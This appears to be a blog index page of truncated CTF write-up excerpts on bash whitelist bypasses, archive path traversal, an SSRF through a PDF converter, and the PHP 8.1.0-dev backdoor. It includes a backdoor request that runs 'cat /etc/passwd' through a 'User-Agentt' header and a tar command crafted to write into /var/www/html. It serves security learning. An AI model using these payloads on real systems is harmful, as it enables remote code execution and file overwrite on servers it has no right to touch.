ffbe0419857d4d8b38a660c9d071e2f099e2bcdb673849c2cb83a442adcbd53cc468d0c72594e5b280b549d5293adc15ff638badd6a26b36c101080c573fc8c0e4a8a05bc9b7534c77a0df7f7b80979d7945186aba8b98b7d1523fcbf559ee97e27e0df97117a4876e471fc52d6c36414511ff9095759d03fecd428771f1a651f63c6da9d5f9c55b55037e4f918e47f40020d0e4456755c287ae16e83424e333475c38c0a38040fcc4047cd8e8e33aaee3a7ef29e949eec3a6b9ede34077211191388adcfd23b4479b557f3aae6e6c21ac32ce696931bcd615a8f54005d5f661984732dab1433bec4f40c54e807a9b9ff03c289596c38914a ...
ffbe0419857d4d8b38a660c9d071e2f099e2bcdb673849c2cb83a442adcbd53cc468d0c72594e5b280b549d5293adc15ff638badd6a26b36c101080c573fc8c0e4a8a05bc9b7534c77a0df7f7b80979d7945186aba8b98b7d1523fcbf559ee97e27e0df97117a4876e471fc52d6c36414511ff9095759d03fecd428771f1a651f63c6da9d5f9c55b55037e4f918e47f40020d0e4456755c287ae16e83424e333475c38c0a38040fcc4047cd8e8e33aaee3a7ef29e949eec3a6b9ede34077211191388adcfd23b4479b557f3aae6e6c21ac32ce696931bcd615a8f54005d5f661984732dab1433bec4f40c54e807a9b9ff03c289596c38914a ...
Linux
未读参考文章: Web-Bash-Vino0o0o 34c3 CTF minbashmaxfun writeup. TL;DR | by Ori Kadosh | Medium 安洵杯的Bash 开题得到源代码 123456789101112131415<?phphighlight_file(__FILE__);if(isset($_POST["cmd"])){ $test = $_POST['cmd']; $white_list = str_split('${#}\\(<)\'0'); $char_list = str_split($test); foreach($char_list as $c){ if(!in_array($c,$white_list)){ die("Cyzcc"); } } exec($ ...
Linux
未读before all在安全中,通过压缩包我们可以实现什么呢? 实现文件穿越目录覆盖how_to_use12345#Python/3.11.1import tarfileimport systar = tarfile.open(sys.argv[1], "r")tar.extractall()#解压缩包 tar解压目录穿越tar 命令可以在打包的时候把路径也打包进去 那么 对于解压 是不是也可以指定目录解压?(目录穿越) 我在自己的主机上执行: 1tar -cPzvf end.tar.gz xxx/../../../var/www/html/xxx.xxx 此时在本机生成了自己的end.tar.gz压缩文件 当在其他机器上解压此文件 会不会在/var/www/html/目录下生成xxx.xxx呢? 经过测试,很多场景都存在这种情况 Java:Java.util.zip、zt-zip 12345678910111213141516171819202122232425262728293031323334353637383940 ...
ffbe0419857d4d8b38a660c9d071e2f099e2bcdb673849c2cb83a442adcbd53cc468d0c72594e5b280b549d5293adc15ff638badd6a26b36c101080c573fc8c0e4a8a05bc9b7534c77a0df7f7b80979d7945186aba8b98b7d1523fcbf559ee97e27e0df97117a4876e471fc52d6c36414511ff9095759d03fecd428771f1a651f63c6da9d5f9c55b55037e4f918e47f40020d0e4456755c287ae16e83424e333475c38c0a38040fcc4047cd8e8e33aaee3a7ef29e949eec3a6b9ede34077211191388adcfd23b4479b557f3aae6e6c21ac32ce696931bcd615a8f54005d5f661984732dab1433bec4f40c54e807a9b9ff03c289596c38914a ...
[NSSRound#20 Basic]CSDN_To_PDF V1.2开题是一个pdf转换器 题目提示是csdn的,猜测是对针对csdn有所过滤,尝试监听一下 抓包,发现是python的 然后尝试监听一下 得到weasyprint 找到漏洞实现ssrf,这里还过滤了html 服务端可以直接放在index.html绕过html的过滤 得到pdf之后使用binwalk分离一下就好 找到flag [NUSTCTF 2022 新生赛]Translate开题是一个简单的页面 查看源代码 下面有神秘的字符串,base64解码得到/test.php得到一部分代码 123456789101112<?phpinclude_once("fun.php");//我的室友板鸭把flag藏到flag.php里了highlight_file(__FILE__);error_reporting(0);$file = $_GET['file'];if (!is_file($file)) { highlight_file(filt ...
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 废洞一个,这里使用**[NSSRound#18 Basic]Becomeroot**复现 验证漏洞存在 123456789101112GET / HTTP/1.1Host: node4.anna.nssctf.cn:28189Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0User-Agentt: zerodiumsystem("cat /etc/passwd");Accept: text/html,application/xhtml+xml ...
ffbe0419857d4d8b38a660c9d071e2f099e2bcdb673849c2cb83a442adcbd53cc468d0c72594e5b280b549d5293adc15ff638badd6a26b36c101080c573fc8c0e4a8a05bc9b7534c77a0df7f7b80979d7945186aba8b98b7d1523fcbf559ee97e27e0df97117a4876e471fc52d6c36414511ff9095759d03fecd428771f1a651f63c6da9d5f9c55b55037e4f918e47f40020d0e4456755c287ae16e83424e333475c38c0a38040fcc4047cd8e8e33aaee3a7ef29e949eec3a6b9ede34077211191388adcfd23b4479b557f3aae6e6c21ac32ce696931bcd615a8f54005d5f661984732dab1433bec4f40c54e807a9b9ff03c289596c38914a ...
prize_p612345678910111213141516171819202122232425262728293031323334353637<?phpfunction x(){ exit();}if(isset($_GET['f'])){ $content = $_GET['content']; if (preg_match('/index|function|x|iconv|UCS|UTF|rot|zlib|quoted|base64|%|toupper|tolower|strip_tags|dechunk|\.\./i', $content)) { die('hacker'); } if ($_GET['f'] == "create"){ file_put_contents($content, '<?=x();?>& ...
ffbe0419857d4d8b38a660c9d071e2f099e2bcdb673849c2cb83a442adcbd53cc468d0c72594e5b280b549d5293adc15ff638badd6a26b36c101080c573fc8c0e4a8a05bc9b7534c77a0df7f7b80979d7945186aba8b98b7d1523fcbf559ee97e27e0df97117a4876e471fc52d6c36414511ff9095759d03fecd428771f1a651f63c6da9d5f9c55b55037e4f918e47f40020d0e4456755c287ae16e83424e333475c38c0a38040fcc4047cd8e8e33aaee3a7ef29e949eec3a6b9ede34077211191388adcfd23b4479b557f3aae6e6c21ac32ce696931bcd615a8f54005d5f661984732dab1433bec4f40c54e807a9b9ff03c289596c38914a ...